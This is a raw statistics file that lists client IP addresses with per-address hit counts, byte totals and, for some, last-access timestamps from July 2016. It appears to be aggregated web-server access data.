79.173.88.11 0 1 186984 
176.59.37.58 0 1 121578 
46.187.25.82 0 1 239041 
95.79.16.89 0 1 342543 
131.72.151.200 1 1 17773 20160728152356
92.248.129.238 0 1 24637 
188.93.56.123 0 2 17877 
61.12.0.43 1 1 17773 20160731215401
176.116.82.4 1 1 20239 20160720100822
89.250.15.135 0 1 323923 
188.227.174.219 3 3 53319 20160722082814
212.2.247.220 0 1 111121 
37.112.226.27 1 31 3319622 20160730023945
37.112.99.115 0 1 93155 
91.241.156.60 2 2 34450 20160724235148
94.126.215.46 1 1 17773 20160722180927
178.68.167.74 0 1 126509 
66.249.93.86 0 8 485550 
189.215.158.235 0 3 26484 
85.140.6.174 0 1 342543 
95.26.172.139 0 1 76479 
95.221.209.239 0 1 228 
109.194.50.197 0 1 55460 
176.77.57.180 0 1 2656 
167.114.100.169 1 1 17773 20160728100241
85.136.167.86 0 1 9743 
84.52.25.213 0 1 76479 
77.51.127.106 0 1 273079 
158.255.5.113 1 1 17773 20160721090923
37.73.206.24 0 1 28288 
95.32.74.33 0 1 93370 
98.247.12.88 0 3 26484 
5.141.214.132 0 1 76479 
95.153.128.132 0 1 338729 
79.68.109.77 0 3 26484 
91.201.247.77 0 1 342543 
217.118.81.18 0 1 20995 
188.75.144.86 1 1 17773 20160725175349
91.238.14.88 0 1 126457 
95.221.196.195 0 1 228 
62.209.158.141 0 1 39840 
178.54.162.130 0 3 26484 
195.58.238.236 0 1 25462 
124.61.221.117 0 3 26484 
82.34.5.44 0 4 28011 
37.110.110.188 0 1 2656 
95.153.130.38 0 1 24018 
188.123.43.156 0 1 55460 
178.207.219.175 0 1 20995 
89.40.194.8 0 1 338729 
176.59.203.94 0 1 24637 
95.108.133.218 0 1 239041 
176.77.12.59 1 17 402478 20160713075745
194.15.116.193 0 1 76479 
80.237.119.144 0 1 239041 
31.42.65.51 0 1 39840 
80.95.38.222 0 3 145803 
184.151.61.131 0 1 26782 
37.204.156.135 0 1 342543 
176.115.34.30 0 1 30300 
121.54.58.130 0 1 121097 
84.156.141.159 0 3 26484 
37.147.102.39 1 1 8691 20160720025718
88.162.78.46 0 3 26484 
109.15.240.168 0 4 28011 
46.166.100.114 0 1 20995 
93.84.163.174 0 1 26782 
149.202.180.198 1 13 240323 20160705104603
93.157.168.21 0 1 70789 
176.77.108.163 0 1 2656 
54.206.70.160 1 1 17773 20160718232110
85.30.249.222 1 1 18868 20160711040514
85.132.55.12 0 1 31736 
107.15.148.245 0 3 26484 
78.121.109.101 0 6 52968 
95.106.198.224 0 1 55460 
92.246.211.87 0 1 38411 
31.180.214.114 0 1 19680 
176.69.90.129 0 1 121097 
37.57.0.211 0 1 7773 
54.158.231.109 1 13 240323 20160706223547
31.180.72.175 0 1 26782 
91.202.107.255 0 1 76479 
128.68.3.31 1 1 17773 20160719120508
141.226.240.53 0 3 26484 
46.147.180.49 0 1 18736 
46.188.29.95 1 13 240323 20160721223924
77.247.20.86 0 1 239041 
89.19.194.64 0 1 342543 
113.240.250.156 1 1 17773 20160731115302
66.249.81.207 0 7 653900 
85.140.3.246 0 1 111121 
92.38.73.235 1 7 516706 20160705215246
178.140.87.197 1 1 17773 20160719120503
90.143.159.193 0 1 19680 
85.21.63.229 0 1 239041 
109.63.222.3 1 1 25913 20160720023029
217.118.91.108 0 1 39840 
90.143.173.247 0 1 25462 
31.173.249.132 0 7 853401 
91.226.121.12 0 1 43628 
31.173.242.233 0 2 298105 
176.113.228.54 1 1 42752 20160717203113
93.79.233.25 0 1 53636 
85.250.101.0 0 1 111121 
62.210.27.34 1 1 17773 20160724120801
178.124.177.152 0 1 239041 
37.215.101.250 0 1 121097 
212.112.107.35 0 1 18736 
188.93.56.130 0 2 282080 
94.140.136.53 0 1 64313 
109.191.216.146 0 1 22609 
85.15.124.44 0 1 20995 
128.68.50.240 1 1 17773 20160711040456
188.163.107.102 1 1 30387 20160707122550
78.28.199.52 1 1 17773 20160725100935
185.137.219.199 3 3 53319 20160728103326
91.191.233.182 0 1 30300 
145.255.172.91 0 1 342543 
1.161.235.99 0 6 52968 
46.8.138.24 1 1 17773 20160721182731
94.158.81.34 0 1 111121 
94.178.153.114 0 1 239041 
128.68.108.201 0 1 58578 
95.221.206.123 1 1 25913 20160719120503
46.165.63.57 0 6 738652 
217.66.158.89 0 1 39840 
83.169.198.44 0 1 273079 
46.19.86.193 0 1 76479 
79.111.137.51 1 1 17773 20160713195317
31.180.196.35 0 1 55460 
93.84.187.207 0 1 342543 
188.232.252.60 0 1 85439 
139.162.37.156 1 1 17773 20160713110543
46.147.7.241 0 1 156347 
212.59.109.4 0 1 108817 
80.68.70.48 0 1 121578 
95.104.222.115 0 1 342543 
178.184.6.204 0 1 121097 
88.200.136.119 0 1 64313 
217.66.152.1 0 1 342543 
178.123.108.163 1 1 29309 20160709235308
176.59.129.31 0 1 24317 
85.90.199.139 0 4 28011 
46.43.196.101 0 1 108817 
109.191.183.176 0 1 130315 
212.13.1.109 0 1 294676 
177.155.162.161 1 1 17773 20160723150500
31.41.93.235 0 4 112869 
31.202.232.13 1 1 14919 20160706225308
109.196.203.43 1 1 8691 20160712234341
5.141.228.25 0 1 12206 
95.27.9.236 1 1 17773 20160712234339
143.255.236.2 2 2 35546 20160716104231
81.94.192.99 1 1 17773 20160718172441
178.92.24.90 0 1 239041 
185.3.35.9 0 1 132795 
66.249.91.216 1 1 17773 20160707220626
185.43.189.26 0 1 12206 
176.59.0.30 0 1 26782 
62.117.117.106 0 5 405810 
176.59.40.241 0 2 62036 
96.2.228.6 1 1 17773 20160721184151
94.45.98.192 0 1 323923 
91.221.235.189 0 1 39840 
109.172.78.210 0 1 17458 
185.43.188.130 0 3 26484 
94.50.5.221 0 1 64313 
31.16.252.139 0 1 111121 
5.167.50.45 0 1 39840 
185.3.34.148 0 1 338729 
5.18.96.231 0 1 31736 
5.139.228.95 0 1 31736 
176.15.230.237 0 1 2656 
37.214.34.64 0 1 43628 
5.79.223.11 0 1 216552 
178.76.202.254 0 1 273079 
85.26.164.75 0 2 277926 
31.202.160.140 0 2 104263 
185.3.33.180 0 1 31736 
80.250.225.220 0 1 131969 
66.249.92.106 1 1 53 20160729032125
77.72.124.186 1 1 17297 20160718164301
88.135.63.189 1 1 20154 20160704224144
176.77.112.150 1 5 89511 20160706155230
138.219.236.2 2 2 35546 20160726151320
78.26.162.206 0 1 113576 
176.212.158.26 0 1 19680 
201.139.80.92 2 2 35546 20160718012807
5.141.217.130 0 1 129624 
188.237.212.202 0 1 17458 
91.205.216.211 0 1 39840 
37.98.254.34 0 1 52821 
178.127.163.120 0 1 55460 
116.58.249.250 2 2 35546 20160725232242
128.68.32.78 0 1 228 
212.83.171.95 2 2 35546 20160720073049
193.111.255.242 0 1 34174 
217.118.79.37 0 1 121097 
81.218.204.220 0 6 44752 
85.140.76.150 0 1 186984 
66.249.88.88 1 4 81304 20160711193644
61.231.189.176 0 3 26484 
217.118.81.19 0 2 40736 
95.26.31.203 1 5 70271 20160706155230
77.66.223.199 0 1 31736 
94.241.243.169 0 3 86054 
187.84.87.186 1 1 17773 20160705195436
31.10.158.153 0 1 39840 
77.121.138.233 0 1 121097 
109.188.126.73 0 3 348576 
186.208.21.88 1 1 17773 20160705151857
61.7.173.52 1 1 17773 20160704182210
46.175.160.41 2 2 34156 20160721000346
91.211.20.141 0 1 26782 
87.228.66.245 1 13 240323 20160719122459
185.3.144.18 0 1 121097 
178.72.178.125 0 1 39840 
66.102.8.235 0 4 68707 
78.37.42.109 0 1 273079 
84.244.22.198 0 1 30300 
195.9.201.206 0 1 20995 
46.188.32.103 1 13 240323 20160719031811
178.94.21.56 0 1 239041 
5.53.113.159 0 1 24018 
185.79.100.36 0 1 273079 
37.123.176.119 0 3 26484 
46.37.158.44 0 1 12206 
80.50.131.174 0 3 26484 
37.17.18.40 0 1 186984 
106.187.102.237 1 1 17773 20160706034601
178.120.57.111 0 3 26484 
208.100.26.229 1 1 17773 20160720175000
176.193.193.70 0 1 228 
37.73.204.244 0 1 273079 
213.87.120.237 0 1 192080 
37.187.71.37 1 1 23703 20160710112217
92.248.159.168 0 1 20995 
89.151.189.111 0 1 192080 
46.211.153.240 0 1 98068 
71.6.158.166 1 1 17773 20160711132431
213.87.225.75 0 1 111121 
85.115.248.214 0 1 19680 
186.95.29.170 0 2 18229 
46.42.166.183 1 8 187887 20160719122526
31.173.82.51 1 1 13220 20160714114022
176.194.245.156 0 1 342543 
212.96.69.218 0 1 39840 
77.120.174.7 0 1 27784 
94.137.30.239 0 1 20995 
77.35.173.67 0 1 342543 
178.34.181.50 0 1 93370 
95.221.199.195 0 3 145803 
81.9.25.81 0 1 76479 
188.255.26.202 2 26 480646 20160713152255
176.120.204.3 0 1 20995 
217.9.156.226 0 1 273079 
185.3.33.243 0 1 30300 
181.49.85.208 0 3 26484 
185.11.29.12 0 1 7773 
185.88.25.46 1 1 17773 20160730044402
46.167.90.10 0 1 192080 
177.234.19.142 0 3 26484 
178.67.160.26 0 1 39840 
200.186.13.182 1 1 17773 20160708154846
37.204.100.84 0 1 228 
92.244.224.32 0 1 239041 
92.242.73.236 0 1 228 
85.95.168.110 0 1 76479 
95.25.210.229 1 5 33826 20160707051923
110.33.208.184 0 1 42989 
95.73.236.165 0 1 342543 
5.140.128.55 0 1 55460 
176.195.116.223 0 1 2656 
178.95.51.251 1 8 81686 20160705171441
77.239.223.133 0 1 38411 
83.220.236.126 0 1 70789 
95.26.91.101 1 1 11056 20160707205547
62.255.130.26 0 6 52968 
67.235.201.121 0 3 26484 
66.102.6.158 2 11 240361 20160725231123
14.32.66.116 0 3 26484 
217.118.79.46 0 2 41592 
79.172.110.0 0 1 2656 
188.32.146.52 1 1 11056 20160701013129
80.83.237.14 0 1 239041 
24.224.72.38 0 3 26484 
46.174.246.23 0 1 30300 
31.204.169.228 0 1 24637 
95.28.77.60 1 1 17773 20160707100637
130.193.200.120 0 3 26484 
86.184.162.78 0 3 26484 
85.140.78.196 0 1 31736 
78.109.36.47 0 1 76479 
95.140.92.83 0 1 342543 
176.193.208.182 0 2 18683692 
37.113.172.60 0 1 239041 
212.205.132.94 0 1 12206 
116.236.171.118 0 3 26484 
178.68.85.54 0 1 342543 
188.227.87.131 0 1 20995 
2.62.170.2 0 1 39840 
128.75.165.245 0 1 39840 
5.45.255.107 0 1 70789 
183.109.79.138 0 3 26484 
190.107.192.2 2 2 35546 20160730191432
145.249.227.4 0 1 121578 
52.221.242.53 1 1 17773 20160711213805
78.26.184.150 0 1 31736 
37.110.70.90 1 13 240323 20160711021602
95.56.244.41 0 1 342543 
178.91.70.231 0 1 17458 
77.35.9.84 0 1 121097 
37.52.216.59 0 1 38411 
83.220.239.215 0 1 342543 
177.104.253.36 1 1 17773 20160701043339
212.142.67.162 0 1 39840 
145.255.176.141 0 3 93848 
58.182.182.204 0 3 26484 
136.169.10.136 0 1 7773 
109.110.160.150 0 3 26484 
186.235.236.62 1 1 17773 20160708134259
95.68.234.247 0 1 342543 
217.118.64.49 0 1 13882 
5.44.168.201 0 1 31736 
109.63.145.168 0 1 2656 
91.79.200.177 0 3 26484 
87.91.195.111 0 3 26484 
37.110.38.12 0 1 2656 
95.221.213.222 0 3 145803 
77.108.247.219 1 2 20429 20160727125355
178.91.43.239 0 1 39840 
109.110.66.103 0 1 31736 
213.230.100.24 0 1 24018 
80.242.73.187 0 1 92656 
185.3.35.78 0 1 34174 
186.249.0.74 0 4 28011 
2.135.45.50 0 1 111121 
95.71.206.20 0 1 39840 
80.70.106.10 0 1 121097 
217.118.93.139 0 1 342543 
217.118.81.20 1 17 357307 20160726015646
93.171.34.255 0 1 12206 
147.30.224.98 0 1 39840 
176.59.130.221 0 1 113576 
5.165.28.45 0 1 342543 
212.96.87.37 0 1 82267 
80.83.237.54 0 1 126457 
134.249.22.209 0 3 26484 
46.233.211.244 0 1 43628 
94.199.111.194 0 1 31736 
66.102.6.162 1 14 229410 20160704175907
94.232.205.62 0 1 112150 
95.24.45.145 0 1 2656 
213.230.78.206 0 1 12206 
73.222.234.104 0 3 26484 
82.219.233.4 0 3 26484 
46.39.231.224 0 1 31736 
90.143.16.101 0 1 82267 
109.108.56.208 0 1 7773 
46.39.46.56 0 1 113576 
167.114.250.27 1 13 240323 20160711015254
138.255.172.2 1 1 17773 20160730054207
46.191.170.210 0 1 186984 
77.87.102.168 0 2 46462 
128.68.62.112 1 1 8691 20160719120503
85.26.234.170 0 1 43628 
31.132.208.185 0 1 24637 
94.79.7.8 0 1 410804 
94.228.207.182 0 1 19741 
80.246.137.87 1 11 189146 20160724105206
213.87.156.215 0 1 66003 
185.46.248.214 2 2 47082 20160710235655
188.254.126.115 0 1 26782 
152.249.156.203 1 1 17773 20160702163330
46.133.114.253 0 1 19741 
213.24.58.142 0 1 37902 
188.0.188.129 0 1 58578 
46.242.123.167 0 1 2656 
5.141.220.243 0 1 273079 
91.235.221.74 0 1 273079 
217.107.126.193 0 1 115170 
131.100.134.123 2 2 35546 20160705082940
62.183.125.238 0 1 24018 
109.127.51.173 0 2 46462 
178.89.74.156 0 1 19741 
109.252.90.80 0 2 233247 
78.85.72.5 2 2 35546 20160708050807
46.53.200.95 0 1 239041 
189.51.98.7 2 2 35546 20160708062045
88.104.236.54 0 3 26484 
212.83.179.44 1 1 17773 20160715234834
176.59.116.19 0 1 16148 
50.195.76.73 0 3 26484 
2.134.184.169 0 1 39840 
176.77.98.78 1 13 240323 20160701120628
194.44.197.154 0 7 884518 
213.87.122.152 0 1 342543 
46.73.230.107 0 1 2656 
211.97.123.106 1 1 17773 20160719105432
77.76.147.178 2 2 35546 20160717153749
95.25.111.125 1 5 33826 20160708084417
194.213.120.8 0 1 24018 
37.215.182.49 0 1 273079 
5.76.30.189 0 1 76479 
185.104.94.56 0 1 239041 
187.147.191.59 0 3 26484 
149.62.51.7 0 1 342543 
87.249.196.61 0 1 192080 
77.245.97.22 0 1 37902 
5.153.135.158 0 1 17458 
2.132.235.182 0 1 342543 
188.32.231.56 0 3 145803 
94.180.192.182 0 1 2656 
46.251.95.45 0 1 2656 
46.159.72.173 0 1 121097 
91.210.2.106 0 1 131969 
95.58.13.251 0 1 39840 
85.117.118.214 0 1 121578 
79.141.211.14 0 1 76479 
188.128.90.190 0 1 239041 
94.50.2.65 0 1 30300 
95.86.246.184 0 1 76479 
194.150.255.6 0 1 26782 
92.246.221.162 0 2 227479 
92.246.198.42 0 1 24637 
85.140.1.186 0 1 39840 
178.213.144.171 0 1 192080 
207.182.136.170 1 1 17773 20160706185742
212.0.218.181 0 1 31736 
37.110.150.147 0 1 2656 
212.113.230.58 0 1 16149 
150.242.17.136 0 3 26484 
37.147.159.205 0 1 126509 
78.26.162.20 0 1 7773 
176.59.70.95 0 1 342543 
89.163.242.91 3 3 53319 20160714025756
46.219.241.226 1 1 16538 20160725121509
70.30.107.159 0 3 26484 
31.129.98.231 0 1 239041 
176.222.206.189 0 1 342543 
37.78.34.37 0 1 121097 
31.173.84.24 0 1 273079 
178.150.211.239 0 1 82267 
70.68.203.237 0 1 8486 
212.100.72.144 0 3 26484 
94.137.30.222 0 1 19741 
194.44.161.124 0 1 30300 
176.59.40.214 0 1 7773 
83.69.244.120 0 1 393123 
66.249.93.90 0 9 609407 
176.8.176.100 1 18 1264896 20160721123011
31.130.73.105 0 1 342543 
178.134.196.114 0 1 25462 
176.59.204.197 0 1 82267 
93.74.50.7 0 2 40736 
185.18.6.132 0 1 342543 
39.43.11.154 0 5 44482 
5.58.6.56 0 1 31736 
217.118.81.238 0 1 23121 
84.242.227.192 0 1 26782 
201.242.53.149 0 3 26484 
217.109.191.185 0 3 26484 
95.153.130.143 0 1 20995 
188.162.241.75 0 1 43628 
80.95.38.142 0 3 26484 
178.127.176.215 0 1 291790 
85.113.35.81 0 1 246425 
2.75.14.87 0 1 25462 
176.77.46.73 1 13 240323 20160724200344
193.34.160.55 0 1 38411 
66.249.82.237 0 1 158647 
178.46.154.129 0 4 28011 
91.196.123.24 2 2 35546 20160704235413
109.86.225.190 0 1 239041 
37.24.86.155 0 4 28011 
213.87.128.194 0 1 239041 
122.216.24.178 0 4 28011 
212.50.134.111 0 3 26484 
46.133.241.132 0 1 31736 
176.14.159.102 0 1 39840 
178.121.33.35 0 1 121097 
66.249.81.204 0 3 222119 
91.236.204.9 2 2 35546 20160707124744
194.88.44.97 0 3 26484 
95.220.35.85 0 1 2656 
37.17.16.60 0 1 239041 
121.72.187.235 0 2 37144 
188.75.234.62 0 1 31736 
83.149.37.190 0 1 39840 
88.135.81.41 0 1 121097 
178.168.186.100 0 1 26782 
5.138.220.202 1 15 260027 20160724170333
85.254.158.128 0 1 26782 
83.139.146.9 0 1 39840 
106.6.76.110 1 1 17773 20160709111121
66.102.9.19 0 1 31736 
90.61.56.128 0 6 52968 
94.200.197.30 0 1 82267 
85.140.1.71 0 1 342543 
217.66.157.116 0 1 39840 
88.200.214.100 0 1 30300 
95.220.90.248 1 1 17773 20160713113735
185.11.29.155 1 1 17773 20160716104339
159.224.194.167 0 1 79202 
178.88.51.253 0 1 131969 
37.110.110.226 0 1 228 
188.32.238.235 0 1 2656 
95.221.201.161 0 1 2656 
194.135.16.248 0 1 192080 
85.26.234.211 0 1 70789 
5.228.16.155 0 1 228 
46.39.36.101 0 1 26895 
187.190.81.208 0 3 26484 
176.62.186.116 0 1 323913 
194.135.32.65 0 1 172437 
91.199.80.100 0 2 55990 
178.212.192.164 0 2 104662 
46.146.0.34 0 1 43628 
66.102.9.88 2 53 3455254 20160731223742
79.172.16.7 0 1 26782 
178.91.190.43 0 1 126509 
185.124.154.238 0 1 121097 
37.110.109.160 1 1 17773 20160701013136
93.171.64.228 1 1 17773 20160723230307
88.200.215.1 0 1 30300 
159.224.153.146 1 13 195488 20160719002757
188.93.56.216 2 2 35546 20160718055820
168.0.199.2 1 1 17773 20160705231020
217.118.81.252 0 1 186984 
46.109.118.111 0 1 34174 
167.114.250.37 2 26 480646 20160712204710
93.81.72.219 1 2 18001 20160702052649
109.173.68.170 0 3 145803 
37.204.154.172 1 5 33826 20160702000656
213.87.224.216 0 1 342543 
79.134.203.210 0 3 26484 
37.214.163.11 1 1 29309 20160713003312
66.102.8.188 1 6 124093 20160729231158
85.140.1.215 0 1 26782 
91.232.120.172 0 1 239041 
81.177.240.252 0 1 239041 
176.101.239.83 0 1 39840 
5.44.169.170 0 1 111121 
92.244.236.86 0 1 70789 
95.52.108.21 0 1 111121 
188.191.16.141 0 1 27784 
176.77.88.223 0 1 2656 
87.236.9.218 0 1 342543 
188.255.28.80 1 1 17773 20160720024158
176.14.221.206 0 1 2656 
66.102.9.108 0 45 2938427 
178.136.130.13 0 1 246425 
91.243.203.221 2 12 204707 20160723172315
178.159.123.187 0 1 115329 
217.67.189.242 0 3 26484 
46.174.113.248 0 1 55460 
37.144.189.215 0 1 16149 
95.153.129.184 0 1 20995 
188.244.137.112 0 1 342543 
62.165.38.102 0 1 273079 
50.116.122.140 2 2 35546 20160719081714
194.246.74.243 2 2 35546 20160705041920
176.59.3.170 0 1 12206 
188.191.20.64 0 1 273079 
78.26.162.246 1 1 17773 20160731142457
5.76.87.107 0 1 239041 
5.1.109.71 1 1 17773 20160725043844
217.118.64.55 0 1 224843 
109.205.114.31 0 1 39840 
46.42.220.176 0 1 239041 
2.134.233.182 0 1 27784 
91.221.70.27 1 1 23703 20160709175944
2.75.38.196 0 1 39840 
5.142.14.139 0 1 108817 
81.94.192.170 1 1 17773 20160722082814
188.32.214.9 1 13 240323 20160725104001
110.33.167.68 0 3 26484 
93.108.85.211 0 1 8486 
78.25.121.122 0 1 27784 
178.121.190.224 0 1 342543 
176.77.89.179 0 1 228 
84.39.244.61 0 1 121097 
94.50.198.187 0 1 342543 
92.125.157.137 0 1 342543 
176.77.15.249 1 1 16453 20160719120504
125.239.123.117 0 3 26484 
31.31.19.94 0 1 111121 
66.102.9.98 1 59 4193214 20160720182109
188.93.56.126 0 1 66003 
93.125.27.3 0 1 239041 
83.69.4.146 0 1 20995 
37.52.94.8 0 1 342543 
178.64.9.175 0 1 145096 
46.211.138.165 0 1 342543 
94.73.204.245 0 1 31736 
93.170.184.68 0 1 55460 
213.59.139.79 0 1 121097 
185.3.151.171 0 2 222242 
37.146.190.218 0 1 2656 
95.153.132.23 0 3 126414 
78.25.121.236 0 1 164560 
89.34.205.175 0 1 121097 
89.40.193.234 0 1 111121 
89.248.172.16 1 1 17773 20160718193757
178.172.150.142 0 1 111678 
177.73.99.84 2 2 35546 20160730032826
147.30.24.18 0 1 131969 
46.251.219.59 0 1 111121 
46.98.68.93 0 1 25462 
217.118.81.249 0 1 273079 
87.117.185.71 0 1 19680 
87.228.109.240 0 1 2656 
37.144.61.36 1 17 402478 20160715084137
187.112.135.177 0 3 26484 
92.255.212.226 0 1 58578 
85.172.190.252 0 1 70789 
91.226.122.113 0 1 43628 
146.120.1.114 0 1 342543 
176.113.31.27 0 1 30300 
91.201.244.234 0 1 273079 
176.209.236.144 0 1 20995 
217.29.112.133 0 1 31736 
185.59.56.18 0 1 55460 
95.153.130.220 0 1 39840 
85.115.248.204 0 1 338729 
95.108.225.206 0 1 58578 
78.25.123.239 0 1 93370 
37.29.88.141 0 1 39840 
46.160.127.156 0 1 64313 
178.207.254.199 0 1 192080 
91.200.234.174 1 11 108554 20160712093352
188.163.106.168 0 2 122107 
2.62.142.235 0 1 82267 
194.28.64.81 0 1 273079 
46.73.157.151 1 13 240323 20160718005708
67.230.55.95 0 3 26484 
54.201.35.124 1 1 17773 20160717061834
92.255.205.72 0 3 26484 
37.78.234.191 0 1 93370 
5.141.126.111 1 1 31880 20160722200722
5.141.216.29 0 1 158647 
85.140.0.239 0 1 111121 
2.61.242.10 0 1 24018 
66.102.6.210 2 9 159134 20160722220757
195.93.165.101 1 18 1264896 20160710163659
185.3.33.75 0 2 271104 
114.120.234.200 0 3 26484 
5.1.109.87 1 1 17773 20160719043358
95.135.26.251 0 1 239041 
83.149.45.190 0 1 27784 
178.120.45.128 0 1 70789 
74.91.28.19 1 1 17773 20160708112130
188.94.224.87 0 3 26484 
91.135.250.230 0 1 129624 
93.77.96.97 1 1 17773 20160727145109
109.237.2.242 0 2 55754 
66.102.6.218 0 6 130861 
128.74.193.252 0 1 7773 
66.249.88.108 0 7 295207 
186.237.128.54 0 3 26484 
176.67.21.66 0 1 111121 
91.202.47.62 0 1 7773 
109.198.252.161 0 1 246425 
31.204.187.32 0 21 1539071 
176.77.4.215 0 1 228 
128.68.6.128 1 17 402478 20160719031810
24.120.145.162 0 3 26484 
79.106.98.66 2 2 35546 20160705091803
187.45.19.112 1 1 17773 20160728190631
93.84.187.112 0 1 121097 
79.141.164.12 1 1 17773 20160729103857
95.29.201.223 0 1 342543 
2.94.255.221 0 1 26782 
185.23.66.45 0 1 342543 
91.242.183.251 0 1 20995 
178.120.171.217 0 1 342543 
83.221.187.36 0 1 76479 
69.120.184.40 0 1 24018 
66.249.93.94 0 13 698723 
95.25.175.202 0 1 228 
37.45.143.62 0 1 20995 
213.168.24.2 0 3 26484 
2.135.236.62 0 1 273079 
205.118.122.193 0 3 26484 
95.153.128.146 0 1 55460 
188.0.130.44 0 1 273079 
212.96.76.224 0 1 20995 
176.60.44.112 0 1 111121 
116.7.40.10 0 3 26484 
78.111.187.7 0 1 338729 
92.37.221.65 0 1 35809 
41.250.139.101 0 3 26484 
37.23.13.48 0 1 93370 
188.32.24.191 1 31 3319622 20160731004049
217.28.216.35 0 2 474054 
91.192.66.154 0 1 76479 
66.240.213.93 1 1 17773 20160723052842
91.246.113.101 0 1 342543 
5.140.235.172 0 1 55460 
91.210.151.117 0 1 111121 
89.250.8.72 0 2 39360 
188.255.59.142 1 1 17773 20160702233318
85.26.165.169 0 1 19680 
188.0.188.158 0 1 39840 
66.102.6.166 0 14 261662 
46.146.16.5 0 1 18736 
86.242.167.168 0 8 626342 
66.102.8.186 0 10 142727 
217.23.77.66 0 1 246425 
37.215.131.50 0 1 55460 
176.209.203.150 0 1 31736 
93.85.39.190 0 1 31736 
98.204.37.112 0 3 26484 
5.18.62.189 0 1 342543 
193.169.111.106 0 1 131969 
77.45.173.119 0 1 39840 
192.162.115.73 0 1 12206 
212.142.78.77 0 2 144626 
194.152.33.42 0 11 513223 
217.118.78.114 0 1 39840 
178.44.141.73 0 1 186984 
208.72.12.4 0 6 52968 
37.212.213.194 0 1 108817 
5.34.90.76 0 1 76479 
188.93.56.121 0 4 66801 
90.112.64.205 0 3 26484 
46.242.122.123 1 13 240323 20160707201009
46.228.102.236 0 1 39840 
94.19.35.170 0 1 239041 
217.25.213.229 0 1 342543 
213.227.235.76 0 3 26484 
85.237.37.204 0 1 239041 
194.177.26.35 0 1 76479 
5.228.190.6 0 1 38411 
188.17.116.72 0 1 27784 
176.65.127.102 0 1 20995 
37.17.4.7 0 1 76479 
93.80.112.94 0 1 129624 
79.165.160.192 1 1 11056 20160702233438
37.17.4.143 0 1 126457 
91.195.90.235 0 3 26484 
66.249.85.177 0 1 43628 
31.173.85.92 0 1 30300 
37.150.161.106 0 1 192080 
5.122.126.67 0 1 8486 
69.244.73.176 0 8 56022 
178.217.192.36 1 1 17773 20160701214845
176.77.48.28 0 1 2656 
188.93.56.124 0 3 35774 
77.41.94.66 1 17 402478 20160714015208
202.158.23.76 0 3 26484 
66.249.85.171 0 1 55460 
46.241.58.166 0 1 158647 
93.80.51.201 0 1 2656 
5.76.15.78 0 1 31736 
176.59.133.195 0 1 342543 
177.155.82.18 1 1 17773 20160707084748
78.36.3.229 0 1 55460 
87.243.45.36 0 1 12206 
160.62.4.101 0 1 46746 
77.41.174.182 0 1 39840 
176.120.49.57 0 1 76479 
183.89.82.123 0 3 26484 
95.31.146.95 0 1 19680 
93.84.160.192 0 1 26782 
5.189.97.90 0 1 127528 
178.207.226.98 0 1 121097 
93.72.142.20 0 1 27784 
91.196.80.121 0 1 342543 
66.249.81.210 0 1 31736 
80.83.224.0 0 1 24018 
185.23.11.169 0 3 383544 
178.88.229.0 0 1 132795 
217.118.81.23 0 1 82267 
217.174.228.181 0 1 61712 
186.144.117.105 0 3 26484 
117.21.226.95 1 1 17773 20160719105428
81.162.64.94 0 1 24018 
5.143.120.199 0 1 31736 
128.68.12.90 0 1 228 
109.196.196.181 0 1 34174 
79.173.83.253 0 1 70789 
176.77.26.35 1 1 11056 20160702052643
111.85.179.130 1 1 17773 20160719105429
94.180.111.98 0 1 291790 
109.251.203.12 0 1 26782 
136.169.240.79 2 11 369589 20160724191408
31.173.85.64 0 1 20995 
176.59.1.83 0 1 131969 
37.112.239.86 1 17 402478 20160713141346
59.152.123.181 0 3 26484 
141.212.122.32 1 1 17773 20160721041409
77.87.102.79 0 1 82267 
88.135.165.115 1 1 17773 20160716113301
37.23.249.112 0 1 129624 
217.29.181.161 0 1 19741 
79.111.128.203 0 1 32543 
130.180.208.37 0 1 19741 
132.255.168.2 2 2 35546 20160714221639
178.187.68.47 0 1 158647 
136.169.193.8 0 1 113576 
217.118.78.94 0 1 70789 
88.206.82.24 0 1 19680 
37.1.32.51 0 1 239041 
99.9.86.185 0 3 26484 
46.49.104.45 0 1 38411 
46.151.6.17 1 1 17773 20160722222004
88.81.37.195 1 17 402478 20160714105758
188.32.244.196 0 1 329 
128.75.173.225 0 1 260381 
88.135.81.11 0 1 239041 
37.150.235.85 0 3 348576 
217.118.81.25 0 1 147220 
78.37.113.21 0 1 273079 
188.239.16.216 0 3 26484 
37.204.70.151 0 1 2656 
54.149.212.46 1 1 17773 20160725224249
79.164.122.180 1 31 3319622 20160719122458
178.91.65.220 0 1 64313 
73.224.4.26 0 3 26484 
37.53.242.139 0 1 342543 
176.213.241.115 0 1 342543 
31.211.28.52 0 1 39840 
31.173.81.158 0 1 342543 
62.183.124.179 0 1 410804 
81.184.1.39 0 3 26484 
46.42.170.172 1 13 240323 20160731001406
93.157.253.42 0 1 186984 
31.132.179.222 0 1 246425 
77.34.216.96 0 3 405786 
176.77.109.107 0 3 145803 
85.28.20.229 0 3 26484 
85.117.100.144 0 1 393123 
75.114.73.218 0 9 710057 
95.37.96.225 0 1 342543 
85.26.183.26 0 1 39840 
50.254.108.206 0 3 26484 
83.149.37.160 0 1 108817 
178.204.160.168 0 1 39840 
91.200.138.85 0 1 39840 
46.150.71.44 0 1 39840 
2.76.225.140 0 1 7773 
37.150.167.247 0 1 19680 
213.87.145.194 0 1 25936 
5.77.166.72 0 1 19741 
46.53.203.200 0 1 132795 
93.76.34.8 0 1 55460 
37.78.100.7 0 2 46462 
38.122.22.146 0 3 26484 
93.75.92.136 0 1 39840 
187.189.106.25 0 3 26484 
91.246.113.48 0 3 26484 
188.32.128.49 0 1 2656 
46.241.7.137 1 6 67825 20160711021607
94.230.246.232 0 1 25462 
216.163.188.236 1 1 17773 20160721210210
46.148.234.33 0 1 342543 
96.228.211.79 3 3 53319 20160725203613
212.74.202.82 0 1 39840 
93.185.192.73 0 1 20995 
78.25.122.33 0 1 7773 
87.117.37.67 0 1 342543 
88.228.165.3 0 2 18229 
176.59.66.52 0 1 342543 
116.88.98.128 0 3 26484 
188.137.28.213 0 3 26484 
188.220.1.133 0 3 26484 
178.91.60.89 0 1 93370 
178.218.117.132 0 3 190919 
5.44.168.30 0 1 273079 
88.86.67.18 0 1 273079 
188.0.188.25 0 1 39840 
188.32.245.26 1 17 402478 20160713152255
94.218.37.164 0 3 26484 
95.141.141.185 0 1 76479 
117.174.247.157 0 3 26484 
66.249.88.98 0 4 54195 
190.110.32.106 1 1 17773 20160704200305
93.81.40.160 0 1 19680 
213.24.125.69 0 1 20995 
188.17.192.58 0 1 26782 
217.174.228.142 0 1 246425 
178.205.47.73 0 1 111121 
